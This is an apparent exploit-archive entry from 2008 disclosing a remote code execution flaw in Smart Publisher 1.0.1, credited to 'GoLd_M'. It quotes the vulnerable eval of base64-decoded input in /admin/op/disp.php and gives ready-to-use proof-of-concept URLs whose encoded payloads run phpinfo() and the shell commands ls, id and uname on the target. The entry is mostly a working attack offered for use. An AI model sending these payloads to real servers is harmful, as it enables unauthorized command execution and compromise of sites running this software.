[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Smart Publisher 1.0.1 (disp.php) Remote Code Execution Vulnerability
# Published : 2008-01-29
# Author : GoLd_M
# Previous Title : Bigware Shop 2.0 pollid Remote SQL Injection Vulnerability
# Next Title : phpCMS 1.2.2 (parser.php file) Remote File Disclosure Vulnerability
###### ###### ############## ###### ###### ######## ##
#### ## ## ## ## ## ## ## ##
######## ## ## ## ######## ## #### ###### ## ## ######## ## ######
## ## ## ## ## ## ## ## #### ## ## ## ## ## ##
########## ## ## ## ########## ## ## ## ########## ## ###### ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## #### ## ## ### ## ## ## ## ## ## ## ##
######### ###### #### ######### ### ###### ########## ###### ########## ###### ##########
######################################################################
### Smart Publisher 1.0.1 (disp.php) Remote Code Execution Exploit ###
### Script : http://sourceforge.net/projects/smart-publisher/ ###
### Vuln Code In '/admin/op/disp.php'In Line '3' ###
### eval("$v=".base64_decode($filedata).";"); <- Vuln ###
### POC : ###
### /admin/op/disp.php?filedata=cGhwaW5mbygp <= phpinfo() Base64 ###
### ?filedata=cGFzc3RoZXUobHMgLWxpYTtpZDt1bmFtZSAtYSk <= passtheu(ls -lia;id;uname -a)
######################################################################
# www.Syue.com [2008-01-29]